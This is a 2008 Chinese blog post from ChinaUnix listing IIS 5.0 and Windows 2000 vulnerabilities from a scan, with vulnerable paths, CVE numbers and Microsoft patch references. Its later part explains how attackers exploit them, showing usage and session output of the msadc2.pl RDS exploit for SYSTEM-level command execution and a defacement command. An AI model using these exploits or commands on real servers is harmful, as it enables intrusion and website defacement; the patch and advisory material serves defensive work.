win 2k server+iis5.0的漏洞大全-剑心通明-ChinaUnix博客

BSD爱好者乐园jxtm.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

剑心通明

博客访问： 18661942
博文数量： 7460
博客积分： 10434
博客等级：上将
技术积分： 78178
用户组：普通用户
注册时间： 2008-03-02 22:54

文章分类

全部博文（7460）

武林英雄攻略（0）
淘宝网推荐（0）

节日礼物（0）

特产美食（0）

运动户外（0）

计算机相关（0）

女人（0）

男人（0）

母婴（0）

居家（0）

美容时尚（0）

手机数码（0）
其他（0）
数据库/php网页编（0）
交换机/路由器/网（0）
AIX（0）
MacOS（0）
C程序设计（0）
BSD相关（0）
shell脚本（0）
未分配的博文（7460）

文章存档

2011年（1）

2009年（669）

2008年（6790）

我的朋友

相关博文

win 2k server+iis5.0的漏洞大全

分类：网络与安全

2008-05-31 20:51:57

（附带黑狐网络的攻击方法）
　　劲刀狂舞最近用twwwscan扫描了自己的win 2k server，web server（iis5.0），sp1，结果很是令人担心。
　　从前笔扫描网络主机时，经常发现有这样的漏洞组合，原来是网络管理员的懒惰，使得主机漏洞百出，我只能把这些漏洞拿出来，伤他们的自尊了。
　　host: 127.0.0.1
　　port: 80
　　Server: Microsoft-IIS/5.0
　　if the webserver is apache,remove unnecessary information
　　
　　IIS (codebrws.asp) Hole B
　　/iissamples/sdk/asp/docs/codebrws.asp
　　solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
　　
　　RDS Securty Hole(msadcs.dll)
　　/msadc/msadcs.dll
　　important patch
　　CVE-1999-1011
　　solution:MS99-025.asp
　　
　　IIS Path Reveal(anything.idq)
　　/test.idq
　　IIS Path Reveal
　　
　　IIS Path Reveal(anything.ida)
　　/test.ida
　　IIS Path Reveal
　　
　　Malform Hit-Highlighting(qfullhit.htw)
　　
　　CVE-2000-0097
　　MS00-006.asp
　　
　　Index Server Security Hole(null.htw)
　　
　　CVE-2000-0097
　　MS00-006.asp
　　
　　FrontPage 2k <=1.1 Path vul
　　/_vti_bin/shtml.dll/nosuch.htm
　　CAN-2000-0413
　　solution:vendor homepage
　　
　　FrontPage 2k,IIS Multiple (shtml.dll)
　　/_vti_bin/shtml.dll
　　good reading Cross-site Scripting Overview
　　solution:vendor homepage
　　
　　Frontpage97 fpcount bof(fpcount.exe)
　　/_vti_bin/fpcount.exe
　　solution:delete fpcount.exe
　　
　　FrontPage MS-DOS Device DoS(shtml.exe)
　　/_vti_bin/shtml.exe
　　vendor homepage
　　
　　IIS 4/5 remote execute check method A
　　
　　important patch
　　solution:MS00-057
　　
　　Indexing service for win2k .htw
　　
　　solution:MS00-084
　　
　　其中：
　　_vti_bin/shtml.dll
　　
　　入侵者利用这个文件将能使您的系统的CPU占用率达到100%
　　如果用户点击上述指定的链接，脚本将通过HTTP请求从客户端传送给可信任的站点，可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时，将执行该脚本，并将赋予来自可信任站点的内容的所有权力赋予该脚本。
　　使用如下格式的URL：
　　
　　
　　shtml.exe
　　
　　如果您使用Front Page作为您的WebServer，那么入侵者能够利用IUSR_用户和shtml.exe入侵您的机器，做您不希望的事
　　提交这样的链接，都可能使FrontPage Server Extensions停止响应：
　　
　　
　　
　　
　　
　　codebrws.asp
　　
　　描述：在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面的路径:
　　
　　就可以查看到index.asp的源码。实际上任何ascii文件都可以浏览。
　　
　　Microsoft IIS Unicode解码目录遍历漏洞
　　
　　这个不用说了，小孩子都知道了。
　　
　　msadc
　　
　　IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行
　　你系统的命令。主要核心问题是存在于RDS Datafactory，默认情况下，
　　它允许远程命令发送到IIS服务器中，这命令会以设备用户的身份运行，
　　其一般默认情况下是SYSTEM用户。
　　
　　利用程序为\cgi\iis_cgi\msadc2.pl，我们看看它的help
　　
　　[quack@chat quack]$ perl msadc2.pl -h
　　-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
　　
　　Usage: msadc.pl -h { -d -X -v }
　　-h = host you want to scan (ip or domain)
　　-d = delay between calls, default 1 second
　　-X = dump Index Server path table, if available
　　-N = query VbBusObj for NetBIOS name
　　-V = use VbBusObj instead of ActiveDataFactory
　　-v = verbose
　　-e = external dictionary file for step 5
　　-u <\\host\share\file> = use UNC file
　　-w = Windows 95 instead of Windows NT
　　-c = v1 compatibility (three step query)
　　-s = run only step
　　
　　Or a -R will resume a (v2) command session
　　
　　[quack@chat quack]$ perl msadc2.pl -h
　　-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
　　Type the command line you want to run (cmd /c assumed):
　　cmd /c
　　
　　如果出现cmd /c后，直接键入命令行，就可以以system权限执行命令了。比如xundi教的：
　　echo hacked by me > d:\inetpub\wwwroot\victimweb\index.

阅读(1205) | 评论(0) | 转发(0) |

上一篇：ftp服务器的安全实现

下一篇：如何禁止查看用户(多图）

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6